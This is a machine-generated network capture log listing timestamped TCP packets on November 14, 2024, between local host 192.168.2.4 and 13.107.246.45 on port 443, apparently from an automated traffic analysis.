                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.993943930 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.998954058 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.999726057 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.999726057 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.999758959 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.999799013 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.015532970 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.015841961 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.015952110 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.015952110 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.016204119 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.016248941 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.018381119 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.018424034 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.018616915 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.018616915 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.018646955 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.129113913 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.129292011 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.129529953 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.129529953 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.129529953 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.131835938 CET49796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.131880999 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.132112026 CET49796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.132210970 CET49796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.132226944 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.133929014 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.134077072 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.134219885 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.134290934 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.134291887 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.134314060 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.134325981 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.136349916 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.136378050 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.136775970 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.136775970 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.136806965 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.263174057 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.263231039 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.294416904 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.294454098 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.341290951 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.341330051 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.696211100 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.696621895 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.696652889 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.697062969 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.697068930 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.727828026 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.728312016 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.728384972 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.728719950 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.728735924 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.750833988 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.751303911 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.751346111 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.751769066 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.751774073 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.859422922 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.859589100 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.859687090 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.859800100 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.859854937 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.859889030 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.859905005 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.862620115 CET49798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.862687111 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.862762928 CET49798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.862947941 CET49798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.862972975 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.873572111 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.873949051 CET49796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.873970032 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.874387026 CET49796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.874397993 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.875777960 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.876127005 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.876137018 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.876494884 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.876499891 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.881089926 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.881246090 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.881308079 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.881354094 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.881354094 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.881371975 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.881393909 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.883658886 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.883692026 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.883754015 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.883878946 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.883893967 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.997287035 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.997539043 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.997587919 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.997622967 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.997637987 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.997651100 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:29.997656107 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.000243902 CET49800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.000299931 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.000369072 CET49800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.000535011 CET49800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.000550032 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.004288912 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.004648924 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.004714966 CET49796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.004751921 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.004797935 CET49796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.004797935 CET49796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.004841089 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.004873991 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.005321026 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.005367041 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.005425930 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.005434990 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.005445957 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.005453110 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.007395029 CET49802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.007420063 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.007488966 CET49802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.007592916 CET49802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.007620096 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.007788897 CET49801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.007807970 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.007919073 CET49801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.007919073 CET49801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.007939100 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.597433090 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.597907066 CET49798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.597995043 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.598403931 CET49798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.598459005 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.614871025 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.615183115 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.615200996 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.615585089 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.615591049 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.725752115 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.726161003 CET49802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.726249933 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.726535082 CET49802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.726548910 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.740019083 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.740113020 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.740264893 CET49798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.740291119 CET49798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.740303993 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.740317106 CET49798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.740322113 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.742784023 CET49803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.742826939 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.742942095 CET49803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.743062019 CET49803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.743083000 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.744457006 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.744642973 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.744688988 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.744716883 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.744733095 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.744744062 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.744748116 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.746099949 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.746529102 CET49801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.746542931 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.747003078 CET49804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.747039080 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.747097015 CET49804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.747107983 CET49801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.747112036 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.747267008 CET49804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.747281075 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.770253897 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.770564079 CET49800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.770587921 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.770914078 CET49800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.770920038 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.852552891 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.852893114 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.853130102 CET49802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.853218079 CET49802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.853218079 CET49802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.853264093 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.853293896 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.857033968 CET49805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.857068062 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.857381105 CET49805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.857734919 CET49805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.857747078 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.876286983 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.876429081 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.876497030 CET49801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.876624107 CET49801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.876643896 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.876676083 CET49801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.876682997 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.879013062 CET49806443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.879054070 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.879121065 CET49806443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.879309893 CET49806443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.879323006 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.906506062 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.906569958 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.906627893 CET49800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.906727076 CET49800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.906752110 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.906786919 CET49800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.906802893 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.909359932 CET49807443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.909393072 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.909475088 CET49807443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.909553051 CET49807443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:30.909569025 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.480004072 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.480505943 CET49804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.480544090 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.480815887 CET49804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.480823040 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.578514099 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.579062939 CET49805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.579092026 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.579452038 CET49805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.579456091 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.590193987 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.590559959 CET49803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.590579987 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.590977907 CET49803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.590991974 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.608839035 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.608895063 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.609143972 CET49804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.609143972 CET49804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.609143972 CET49804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.609813929 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.610256910 CET49806443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.610269070 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.610641003 CET49806443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.610646963 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.611982107 CET49808443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.612021923 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.612181902 CET49808443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.612344980 CET49808443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.612360001 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.652368069 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.652894974 CET49807443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.652920961 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.653312922 CET49807443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.653317928 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.706384897 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.706584930 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.706665993 CET49805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.706736088 CET49805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.706751108 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.706759930 CET49805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.706764936 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.709131002 CET49809443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.709167004 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.709222078 CET49809443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.709381104 CET49809443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.709394932 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.723581076 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.724138021 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.724189997 CET49803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.724251986 CET49803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.724251986 CET49803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.724267006 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.724275112 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.727974892 CET49810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.728003025 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.728142977 CET49810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.728370905 CET49810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.728382111 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.740277052 CET4434980613.107.246.45192.168.2.4
